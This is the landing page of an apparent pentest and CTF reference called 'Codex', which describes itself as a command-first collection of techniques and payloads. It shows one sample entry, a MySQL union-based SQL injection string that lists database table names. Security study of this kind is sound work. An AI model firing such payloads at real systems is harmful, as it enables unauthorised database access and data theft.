Skip to content

Codex

codex / main · 163 pages · 15 clusters · 3 sections athena-os · cc-by-sa-4.0

The Codex is a field reference for pentests, CTFs, and certifications. Command-first: technique, payload, success indicator. No theory you don't need. OS-agnostic.

163 pages
15 clusters
3 sections
$ ls codex/
$ codex --random
sqli · union-based · mysql see page →
' UNION SELECT 1,GROUP_CONCAT(table_name),3 FROM information_schema.tables WHERE table_schema=database()-- -